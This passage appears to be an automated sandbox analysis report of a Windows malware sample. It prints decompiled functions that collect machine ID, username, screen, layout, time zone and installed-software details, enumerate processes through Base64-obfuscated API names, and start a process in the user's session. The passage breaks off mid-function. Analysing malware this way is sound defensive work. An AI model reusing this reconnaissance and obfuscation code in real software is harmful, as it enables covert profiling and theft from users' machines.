Opcode Fuzzy Hash: 60dc013b294cd3571c817187dd54daba4cfcc5ebfeb65134b18bef8d8193c09a
Instruction Fuzzy Hash: C8812C70A40209ABCB01FFA1DC42BCDBB79EF49309F61807BB104B6196D67DEA458B59

Uniqueness

Uniqueness Score: -1.00%

Function 00416978, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 211
sleepCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E00416978(signed int __eax, void* __ebx, intOrPtr* __edx, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				intOrPtr* _t59;
				intOrPtr* _t141;
				void* _t142;
				intOrPtr _t172;
				void* _t180;
				intOrPtr _t183;
				intOrPtr _t184;

				_t181 = __esi;
				asm("das");
				 *__eax =  *__eax + __eax;
				 *__edx =  *__edx + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax & __eax;
				 *__eax =  *__eax + __eax;
				_t59 = __eax +  *__eax;
				 *_t59 =  *_t59 + _t59;
				 *_t59 =  *_t59 + _t59;
				_t183 = _t184;
				_t142 = 0xc;
				do {
					_push(0);
					_push(0);
					_t142 = _t142 - 1;
					_t189 = _t142;
				} while (_t142 != 0);
				_t141 = _t59;
				_push(_t183);
				_push(0x416c78);
				_push( *[fs:eax]);
				 *[fs:eax] = _t184;
				_push("MachineID :   ");
				E00406CE8( &_v8, _t141, __esi);
				_push(_v8);
				_push(0x416ca4);
				E00403850();
				_push( *_t141);
				_push("EXE_PATH  :   ");
				E00416684(0,  &_v12);
				_push(_v12);
				_push(0x416cc8);
				E00403850();
				_push( *_t141);
				_push("Windows    :   ");
				E00407B08( &_v28, _t141, _t180, __esi);
				_push(_v28);
				_push(0x416cf0);
				E00403850();
				E00403D88( &_v20, _v24);
				_push(_v20);
				E004066E4( &_v32, _t189);
				_push(_v32);
				_push(0x416cf8);
				E00406BD8( &_v36);
				_push(_v36);
				_push(0x416d00);
				E00403E78();
				E0040377C(_t141, _v16);
				E004037DC( &_v48, "Computer(Username) :   ",  *_t141);
				E00403D88( &_v44, _v48);
				_push(_v44);
				E00406634( &_v52);
				_push(_v52);
				_push(0x416d2c);
				E004065F0( &_v56);
				_push(_v56);
				_push(0x416d34);
				_push(0x416d00);
				E00403E78();
				E0040377C(_t141, _v40);
				E004037DC( &_v68, "Screen: ",  *_t141);
				E00403D88( &_v64, _v68);
				_push(_v64);
				E0040709C(GetSystemMetrics(0), _t141,  &_v72, __esi, _t189);
				_push(_v72);
				_push(0x416d50);
				E0040709C(GetSystemMetrics(1), _t141,  &_v76, _t181, _t189);
				_push(_v76);
				_push(0x416d00);
				E00403E78();
				E0040377C(_t141, _v60);
				_push( *_t141);
				_push("Layouts: ");
				E004166B4( &_v80, _t141, _t180, _t181);
				_push(_v80);
				_push(0x416ca4);
				E00403850();
				_push( *_t141);
				_push("LocalTime: ");
				E00416894( &_v84, _t141, _t181);
				_push(_v84);
				_push(0x416ca4);
				E00403850();
				_push( *_t141);
				_push("Zone: ");
				E00416794( &_v88, _t141, _t180, _t181, _t189);
				_push(_v88);
				_push(0x416cc8);
				E00403850();
				_push( *_t141);
				E00415E44( &_v92, _t141, _t180, _t181);
				_push(_v92);
				_push(0x416cc8);
				E00403850();
				Sleep(1);
				_push( *_t141);
				E00416290( &_v96, _t141, _t180, _t181, _t189);
				_push(_v96);
				_push(0x416ca4);
				_push(0x416ca4);
				E00403850();
				Sleep(1);
				_push( *_t141);
				_push("[Soft]");
				E00403850();
				Sleep(1);
				E0041564C( &_v100, _t141, _t180, _t181);
				E00403798(_t141, _v100);
				_t172 = 0x416ca4;
				 *[fs:eax] = _t172;
				_push(E00416C7F);
				E00403508( &_v100, 6);
				E00403BF4( &_v76, 2);
				E004034E4( &_v68);
				E00403BF4( &_v64, 4);
				E004034E4( &_v48);
				E00403BF4( &_v44, 4);
				E00403508( &_v28, 2);
				E00403BF4( &_v20, 2);
				return E00403508( &_v12, 2);
			}

0x00416978
0x00416978
0x00416979
0x0041697b
0x0041697d
0x0041697f
0x00416980
0x00416982
0x00416984
0x00416986
0x0041698a
0x0041698d
0x0041698f
0x00416994
0x00416994
0x00416996
0x00416998
0x00416998
0x00416998
0x0041699c
0x004169a0
0x004169a1
0x004169a6
0x004169a9
0x004169ac
0x004169b4
0x004169b9
0x004169bc
0x004169c8
0x004169cd
0x004169cf
0x004169d9
0x004169de
0x004169e1
0x004169ed
0x004169f2
0x004169f4
0x004169fc
0x00416a01
0x00416a04
0x00416a11
0x00416a1c
0x00416a21
0x00416a27
0x00416a2c
0x00416a2f
0x00416a37
0x00416a3c
0x00416a3f
0x00416a4c
0x00416a56
0x00416a65
0x00416a70
0x00416a75
0x00416a7b
0x00416a80
0x00416a83
0x00416a8b
0x00416a90
0x00416a93
0x00416a98
0x00416aa5
0x00416aaf
0x00416abe
0x00416ac9
0x00416ace
0x00416adb
0x00416ae0
0x00416ae3
0x00416af2
0x00416af7
0x00416afa
0x00416b07
0x00416b11
0x00416b16
0x00416b18
0x00416b20
0x00416b25
0x00416b28
0x00416b34
0x00416b39
0x00416b3b
0x00416b43
0x00416b48
0x00416b4b
0x00416b57
0x00416b5c
0x00416b5e
0x00416b66
0x00416b6b
0x00416b6e
0x00416b7a
0x00416b7f
0x00416b84
0x00416b89
0x00416b8c
0x00416b98
0x00416b9f
0x00416ba4
0x00416ba9
0x00416bae
0x00416bb1
0x00416bb6
0x00416bc2
0x00416bc9
0x00416bce
0x00416bd0
0x00416be1
0x00416be8
0x00416bf0
0x00416bfa
0x00416c01
0x00416c04
0x00416c07
0x00416c14
0x00416c21
0x00416c29
0x00416c36
0x00416c3e
0x00416c4b
0x00416c58
0x00416c65
0x00416c77

APIs

GetSystemMetrics.USER32 ref: 00416AD3
GetSystemMetrics.USER32 ref: 00416AEA

Part of subcall function 00415E44: GetSystemInfo.KERNEL32(0041985E,00000000,00415FD0,?,?,00000000,00000000,?,00416B89,?,,?,Zone: ,?,00416CA4,?), ref: 00415E68

Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,00416CA4,?,LocalTime: ,?,00416CA4,?,Layouts: ,?), ref: 00416B9F

Part of subcall function 00416290: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,), ref: 00416300
Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416306
Part of subcall function 00416290: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,), ref: 0041632E
Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416334
Part of subcall function 00416290: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE), ref: 00416373
Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416379

Sleep.KERNEL32(00000001,00416CA4,00416CA4,?,?,00000001,,?,?,,?,Zone: ,?,00416CA4,?,LocalTime: ), ref: 00416BC9
Sleep.KERNEL32(00000001,00416CA4,[Soft],?,00000001,00416CA4,00416CA4,?,?,00000001,,?,?,,?,Zone: ), ref: 00416BE8

Part of subcall function 0041564C: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A212,00000000,00415B6E,?,-00000001,?,?,00000000,00000000,?,00416BF5,00000001), ref: 004156A9
Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A212,00000000,?,000003E9), ref: 00415831
Part of subcall function 0041564C: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A212,0041A212,00000001,?,000003E9,),?,?,00000000,00415C44,?,?), ref: 0041586C
Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A212,00000000,?,000003E9), ref: 004159F4

Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07

Strings

, xrefs: 004169E1, 00416B6E, 00416B8C
Layouts: , xrefs: 00416B18
Computer(Username) : , xrefs: 00416A60
MachineID : , xrefs: 004169AC
[Soft], xrefs: 00416BD0
Zone: , xrefs: 00416B5E
Screen: , xrefs: 00416AB9
EXE_PATH : , xrefs: 004169CF
Windows : , xrefs: 004169F4
LocalTime: , xrefs: 00416B3B

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
API String ID: 75899496-943277980
Opcode ID: 28bfc0a8fc3c13f9a819c7c350de19ea6d797103c580f24c512547b95e8ad12f
Instruction ID: ba9566fa5802b655d19b309e0ce3e7f0f20b9e85fb6ad6d3dc3daba04cc241c3
Opcode Fuzzy Hash: 28bfc0a8fc3c13f9a819c7c350de19ea6d797103c580f24c512547b95e8ad12f
Instruction Fuzzy Hash: 70811D70A40209ABCB01FFA1DC42BCDBB79EF45309F61807BB104B61D6D67DEA458B59

Uniqueness

Uniqueness Score: -1.00%

Function 0041698C, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 201
sleepCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E0041698C(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				intOrPtr* _t140;
				void* _t141;
				intOrPtr _t171;
				intOrPtr _t182;
				intOrPtr _t183;

				_t180 = __esi;
				_t179 = __edi;
				_t182 = _t183;
				_t141 = 0xc;
				do {
					_push(0);
					_push(0);
					_t141 = _t141 - 1;
					_t184 = _t141;
				} while (_t141 != 0);
				_t140 = __eax;
				_push(_t182);
				_push(0x416c78);
				_push( *[fs:eax]);
				 *[fs:eax] = _t183;
				_push("MachineID :   ");
				E00406CE8( &_v8, __eax, __esi);
				_push(_v8);
				_push(0x416ca4);
				E00403850();
				_push( *_t140);
				_push("EXE_PATH  :   ");
				E00416684(0,  &_v12);
				_push(_v12);
				_push(0x416cc8);
				E00403850();
				_push( *_t140);
				_push("Windows    :   ");
				E00407B08( &_v28, _t140, __edi, __esi);
				_push(_v28);
				_push(0x416cf0);
				E00403850();
				E00403D88( &_v20, _v24);
				_push(_v20);
				E004066E4( &_v32, _t184);
				_push(_v32);
				_push(0x416cf8);
				E00406BD8( &_v36);
				_push(_v36);
				_push(0x416d00);
				E00403E78();
				E0040377C(_t140, _v16);
				E004037DC( &_v48, "Computer(Username) :   ",  *_t140);
				E00403D88( &_v44, _v48);
				_push(_v44);
				E00406634( &_v52);
				_push(_v52);
				_push(0x416d2c);
				E004065F0( &_v56);
				_push(_v56);
				_push(0x416d34);
				_push(0x416d00);
				E00403E78();
				E0040377C(_t140, _v40);
				E004037DC( &_v68, "Screen: ",  *_t140);
				E00403D88( &_v64, _v68);
				_push(_v64);
				E0040709C(GetSystemMetrics(0), _t140,  &_v72, _t180, _t184);
				_push(_v72);
				_push(0x416d50);
				E0040709C(GetSystemMetrics(1), _t140,  &_v76, _t180, _t184);
				_push(_v76);
				_push(0x416d00);
				E00403E78();
				E0040377C(_t140, _v60);
				_push( *_t140);
				_push("Layouts: ");
				E004166B4( &_v80, _t140, __edi, _t180);
				_push(_v80);
				_push(0x416ca4);
				E00403850();
				_push( *_t140);
				_push("LocalTime: ");
				E00416894( &_v84, _t140, _t180);
				_push(_v84);
				_push(0x416ca4);
				E00403850();
				_push( *_t140);
				_push("Zone: ");
				E00416794( &_v88, _t140, _t179, _t180, _t184);
				_push(_v88);
				_push(0x416cc8);
				E00403850();
				_push( *_t140);
				E00415E44( &_v92, _t140, _t179, _t180);
				_push(_v92);
				_push(0x416cc8);
				E00403850();
				Sleep(1);
				_push( *_t140);
				E00416290( &_v96, _t140, _t179, _t180, _t184);
				_push(_v96);
				_push(0x416ca4);
				_push(0x416ca4);
				E00403850();
				Sleep(1);
				_push( *_t140);
				_push("[Soft]");
				E00403850();
				Sleep(1);
				E0041564C( &_v100, _t140, _t179, _t180);
				E00403798(_t140, _v100);
				_t171 = 0x416ca4;
				 *[fs:eax] = _t171;
				_push(E00416C7F);
				E00403508( &_v100, 6);
				E00403BF4( &_v76, 2);
				E004034E4( &_v68);
				E00403BF4( &_v64, 4);
				E004034E4( &_v48);
				E00403BF4( &_v44, 4);
				E00403508( &_v28, 2);
				E00403BF4( &_v20, 2);
				return E00403508( &_v12, 2);
			}

0x0041698c
0x0041698c
0x0041698d
0x0041698f
0x00416994
0x00416994
0x00416996
0x00416998
0x00416998
0x00416998
0x0041699c
0x004169a0
0x004169a1
0x004169a6
0x004169a9
0x004169ac
0x004169b4
0x004169b9
0x004169bc
0x004169c8
0x004169cd
0x004169cf
0x004169d9
0x004169de
0x004169e1
0x004169ed
0x004169f2
0x004169f4
0x004169fc
0x00416a01
0x00416a04
0x00416a11
0x00416a1c
0x00416a21
0x00416a27
0x00416a2c
0x00416a2f
0x00416a37
0x00416a3c
0x00416a3f
0x00416a4c
0x00416a56
0x00416a65
0x00416a70
0x00416a75
0x00416a7b
0x00416a80
0x00416a83
0x00416a8b
0x00416a90
0x00416a93
0x00416a98
0x00416aa5
0x00416aaf
0x00416abe
0x00416ac9
0x00416ace
0x00416adb
0x00416ae0
0x00416ae3
0x00416af2
0x00416af7
0x00416afa
0x00416b07
0x00416b11
0x00416b16
0x00416b18
0x00416b20
0x00416b25
0x00416b28
0x00416b34
0x00416b39
0x00416b3b
0x00416b43
0x00416b48
0x00416b4b
0x00416b57
0x00416b5c
0x00416b5e
0x00416b66
0x00416b6b
0x00416b6e
0x00416b7a
0x00416b7f
0x00416b84
0x00416b89
0x00416b8c
0x00416b98
0x00416b9f
0x00416ba4
0x00416ba9
0x00416bae
0x00416bb1
0x00416bb6
0x00416bc2
0x00416bc9
0x00416bce
0x00416bd0
0x00416be1
0x00416be8
0x00416bf0
0x00416bfa
0x00416c01
0x00416c04
0x00416c07
0x00416c14
0x00416c21
0x00416c29
0x00416c36
0x00416c3e
0x00416c4b
0x00416c58
0x00416c65
0x00416c77

APIs

GetSystemMetrics.USER32 ref: 00416AD3
GetSystemMetrics.USER32 ref: 00416AEA

Part of subcall function 00415E44: GetSystemInfo.KERNEL32(0041985E,00000000,00415FD0,?,?,00000000,00000000,?,00416B89,?,,?,Zone: ,?,00416CA4,?), ref: 00415E68

Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,00416CA4,?,LocalTime: ,?,00416CA4,?,Layouts: ,?), ref: 00416B9F

Part of subcall function 00416290: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,), ref: 00416300
Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416306
Part of subcall function 00416290: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,), ref: 0041632E
Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416334
Part of subcall function 00416290: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE), ref: 00416373
Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416379

Sleep.KERNEL32(00000001,00416CA4,00416CA4,?,?,00000001,,?,?,,?,Zone: ,?,00416CA4,?,LocalTime: ), ref: 00416BC9
Sleep.KERNEL32(00000001,00416CA4,[Soft],?,00000001,00416CA4,00416CA4,?,?,00000001,,?,?,,?,Zone: ), ref: 00416BE8

Part of subcall function 0041564C: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A212,00000000,00415B6E,?,-00000001,?,?,00000000,00000000,?,00416BF5,00000001), ref: 004156A9
Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A212,00000000,?,000003E9), ref: 00415831
Part of subcall function 0041564C: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A212,0041A212,00000001,?,000003E9,),?,?,00000000,00415C44,?,?), ref: 0041586C
Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A212,00000000,?,000003E9), ref: 004159F4

Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07

Strings

, xrefs: 004169E1, 00416B6E, 00416B8C
Layouts: , xrefs: 00416B18
Computer(Username) : , xrefs: 00416A60
MachineID : , xrefs: 004169AC
[Soft], xrefs: 00416BD0
Zone: , xrefs: 00416B5E
Screen: , xrefs: 00416AB9
EXE_PATH : , xrefs: 004169CF
Windows : , xrefs: 004169F4
LocalTime: , xrefs: 00416B3B

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
API String ID: 75899496-943277980
Opcode ID: 78db04d285f91a2d8200e2e459f726382f96d17f141597859092816098249816
Instruction ID: b8284bc9f62184e4db5d5ca1727f6710c034d5e6d015895e5eeee5dd02488032
Opcode Fuzzy Hash: 78db04d285f91a2d8200e2e459f726382f96d17f141597859092816098249816
Instruction Fuzzy Hash: 2F711C70A40109ABDF01FFE1DC42BCDBB79EF48709F61803BB104B6296D67DEA458A59

Uniqueness

Uniqueness Score: -1.00%

Function 00407E8F, Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 98
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E00407E8F(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v36;
				intOrPtr _v96;
				char _v104;
				char _v108;
				intOrPtr _v117;
				_Unknown_base(*)()* _t27;
				_Unknown_base(*)()* _t29;
				intOrPtr* _t60;
				intOrPtr _t73;
				intOrPtr* _t75;
				void* _t78;
				void* _t80;

				_v117 = _v117 + __edx;
				_v108 = 0;
				_v8 = 0;
				_v16 = 0;
				 *[fs:eax] = _t80 + 0xffffff98;
				_t27 = GetProcAddress(LoadLibraryA("kernel32.dll"), "WTSGetActiveConsoleSessionId");
				_t29 = GetProcAddress(LoadLibraryA("wtsapi32.dll"), "WTSQueryUserToken");
				_t75 = GetProcAddress(LoadLibraryA("userenv.dll"), "CreateEnvironmentBlock");
				E00402754(0,  &_v108);
				E00403D88( &_v16, _v108);
				E00404F5C();
				_v104 = 0x44;
				_v96 = 0;
				 *_t27( *[fs:eax], 0x407fa6, _t80, __edi, __esi, __ebx, _t78);
				_push( &_v12);
				_push(0);
				if( *_t29() != 0) {
					 *_t75( &_v20, _v12, 0xffffffff);
					_t60 =  *0x41b32c; // 0x41c724
					 *((intOrPtr*)( *_t60))(_v12, E00403D98(_v16), E00403D98(_v8), 0, 0, 0, 0x400, _v20, 0,  &_v104,  &_v36);
					asm("sbb eax, eax");
				}
				_pop(_t73);
				 *[fs:eax] = _t73;
				_push(E00407FAD);
				E004034E4( &_v108);
				E00403BDC( &_v16);
				return E00403BDC( &_v8);
			}

0x00407e8f
0x00407e9b
0x00407e9e
0x00407ea1
0x00407eaf
0x00407ec2
0x00407ed9
0x00407ef5
0x00407efc
0x00407f07
0x00407f14
0x00407f19
0x00407f22
0x00407f25
0x00407f2c
0x00407f2d
0x00407f32
0x00407f3e
0x00407f6f
0x00407f76
0x00407f7b
0x00407f7e
0x00407f82
0x00407f85
0x00407f88
0x00407f90
0x00407f98
0x00407fa5

APIs

LoadLibraryA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407EBC
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407EC2
LoadLibraryA.KERNEL32(wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407ED3
GetProcAddress.KERNEL32(00000000,wtsapi32.dll), ref: 00407ED9
LoadLibraryA.KERNEL32(userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407EEA
GetProcAddress.KERNEL32(00000000,userenv.dll), ref: 00407EF0

Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,?,?,004195AF,?), ref: 00402778

Strings

D, xrefs: 00407F19
CreateEnvironmentBlock, xrefs: 00407EE0
userenv.dll, xrefs: 00407EE5
WTSQueryUserToken, xrefs: 00407EC9
WTSGetActiveConsoleSessionId, xrefs: 00407EB2
kernel32.dll, xrefs: 00407EB7
wtsapi32.dll, xrefs: 00407ECE

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressLibraryLoadProc$FileModuleName
String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
API String ID: 2206896924-1825016774
Opcode ID: 0cb1a10cb0afd6386a7f655548666b5db567e4255bdcd2ba9efbb176b3dd9032
Instruction ID: 9bf8d232eeb036b67e33b264b33e971c9bdc3eb444cf3167ee6f8a24d5f4ba5e
Opcode Fuzzy Hash: 0cb1a10cb0afd6386a7f655548666b5db567e4255bdcd2ba9efbb176b3dd9032
Instruction Fuzzy Hash: B0312BB1A44209AEDB00EBE5CC42F9EBBF8AF49704F50057AF514F71D1DA78AA058B58

Uniqueness

Uniqueness Score: -1.00%

Function 00407E90, Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 98
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00407E90(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v36;
				intOrPtr _v96;
				char _v104;
				char _v108;
				_Unknown_base(*)()* _t25;
				_Unknown_base(*)()* _t27;
				intOrPtr* _t58;
				intOrPtr _t71;
				intOrPtr* _t73;
				void* _t76;
				void* _t78;

				_v108 = 0;
				_v8 = 0;
				_v16 = 0;
				 *[fs:eax] = _t78 + 0xffffff98;
				_t25 = GetProcAddress(LoadLibraryA("kernel32.dll"), "WTSGetActiveConsoleSessionId");
				_t27 = GetProcAddress(LoadLibraryA("wtsapi32.dll"), "WTSQueryUserToken");
				_t73 = GetProcAddress(LoadLibraryA("userenv.dll"), "CreateEnvironmentBlock");
				E00402754(0,  &_v108);
				E00403D88( &_v16, _v108);
				E00404F5C();
				_v104 = 0x44;
				_v96 = 0;
				 *_t25( *[fs:eax], 0x407fa6, _t78, __edi, __esi, __ebx, _t76);
				_push( &_v12);
				_push(0);
				if( *_t27() != 0) {
					 *_t73( &_v20, _v12, 0xffffffff);
					_t58 =  *0x41b32c; // 0x41c724
					 *((intOrPtr*)( *_t58))(_v12, E00403D98(_v16), E00403D98(_v8), 0, 0, 0, 0x400, _v20, 0,  &_v104,  &_v36);
					asm("sbb eax, eax");
				}
				_pop(_t71);
				 *[fs:eax] = _t71;
				_push(E00407FAD);
				E004034E4( &_v108);
				E00403BDC( &_v16);
				return E00403BDC( &_v8);
			}

0x00407e9b
0x00407e9e
0x00407ea1
0x00407eaf
0x00407ec2
0x00407ed9
0x00407ef5
0x00407efc
0x00407f07
0x00407f14
0x00407f19
0x00407f22
0x00407f25
0x00407f2c
0x00407f2d
0x00407f32
0x00407f3e
0x00407f6f
0x00407f76
0x00407f7b
0x00407f7e
0x00407f82
0x00407f85
0x00407f88
0x00407f90
0x00407f98
0x00407fa5

APIs

LoadLibraryA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407EBC
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407EC2
LoadLibraryA.KERNEL32(wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407ED3
GetProcAddress.KERNEL32(00000000,wtsapi32.dll), ref: 00407ED9
LoadLibraryA.KERNEL32(userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407EEA
GetProcAddress.KERNEL32(00000000,userenv.dll), ref: 00407EF0

Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,?,?,004195AF,?), ref: 00402778

Strings

D, xrefs: 00407F19
CreateEnvironmentBlock, xrefs: 00407EE0
userenv.dll, xrefs: 00407EE5
WTSQueryUserToken, xrefs: 00407EC9
WTSGetActiveConsoleSessionId, xrefs: 00407EB2
kernel32.dll, xrefs: 00407EB7
wtsapi32.dll, xrefs: 00407ECE

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressLibraryLoadProc$FileModuleName
String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
API String ID: 2206896924-1825016774
Opcode ID: 984abb6abeb68ca2210e3db115ae7419a545ddaace0a8bc11d40afc7d51257d8
Instruction ID: 15232c232ae21084946ce838b98eef105223b8b68f92314a8400df0ccc42bf71
Opcode Fuzzy Hash: 984abb6abeb68ca2210e3db115ae7419a545ddaace0a8bc11d40afc7d51257d8
Instruction Fuzzy Hash: CF313AB1A04309AEDB00EBE5CC42F9EBBECAF49704F500576F514F71D1EA78AA048B58

Uniqueness

Uniqueness Score: -1.00%

Function 00416290, Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 225
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00416290(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				long _v12;
				intOrPtr _v16;
				char _v17;
				char _v24;
				char _v28;
				char _v584;
				char _v588;
				char _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				CHAR* _t113;
				CHAR* _t119;
				CHAR* _t125;
				void* _t137;
				void* _t141;
				void* _t169;
				signed int _t170;
				void* _t171;
				intOrPtr* _t174;
				signed int _t183;
				intOrPtr* _t192;
				void* _t193;
				signed int _t194;
				signed int _t195;
				intOrPtr _t214;
				intOrPtr _t216;
				signed int _t229;
				intOrPtr* _t239;
				signed int _t240;
				signed int _t242;
				void* _t243;
				void* _t244;
				void* _t246;
				intOrPtr _t247;

				_t238 = __esi;
				_t245 = _t246;
				_t247 = _t246 + 0xfffffda0;
				_v612 = 0;
				_v608 = 0;
				_v604 = 0;
				_v596 = 0;
				_v600 = 0;
				_v592 = 0;
				_v588 = 0;
				_v8 = 0;
				_v24 = 0;
				_v16 = __eax;
				 *[fs:eax] = _t247;
				E004069A8("Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90", __ebx,  &_v588, __edi, __esi);
				_t113 = E00403990(_v588);
				_t192 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t113);
				E004069A8("UHJvY2VzczMyRmlyc3RX", _t192,  &_v592, __edi, __esi);
				_t119 = E00403990(_v592);
				_t235 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t119);
				E004069A8("UHJvY2VzczMyTmV4dFc=", _t192,  &_v596, _t235, __esi);
				_t125 = E00403990(_v596);
				E004069A8("a2VybmVsMzIuZGxs", _t192,  &_v600, _t235, _t238);
				_t239 = GetProcAddress(LoadLibraryA(E00403990(_v600)), _t125);
				E004034E4(_v16);
				_t193 =  *_t192(2, 0,  *[fs:eax], 0x4165c6, _t246, __edi, __esi, __ebx, _t244);
				if(_t193 != 0xffffffff) {
					_v584 = 0x22c;
					_push( &_v584);
					_push(_t193);
					if( *_t235() != 0) {
						do {
							_push(E00404648(_v8) + 1);
							E00404804();
							_t183 = E00404648(_v8);
							_t243 =  &_v584;
							memcpy(_v8 + _t183 * 0x8b * 4 - 0x22c, _t243, 0x8b << 2);
							_t247 = _t247 + 0x10;
							_t235 = _t243 + 0x116;
							_t239 = _t239;
							 *((intOrPtr*)(_v8 + E00404648(_v8) * 0x8b * 4 - 0x20c)) = 0;
							_push( &_v584);
							_push(_t193);
						} while ( *_t239() != 0);
					}
					_t174 =  *0x41b1b4; // 0x41c690
					 *((intOrPtr*)( *_t174))(_t193);
				}
				_t137 = E00404648(_v8) - 1;
				if(_t137 >= 0) {
					_v28 = _t137 + 1;
					_t195 = 0;
					do {
						_v17 = 1;
						_t169 = E00404648(_v8) - 1;
						if(_t169 >= 0) {
							_t171 = _t169 + 1;
							_t229 = 0;
							do {
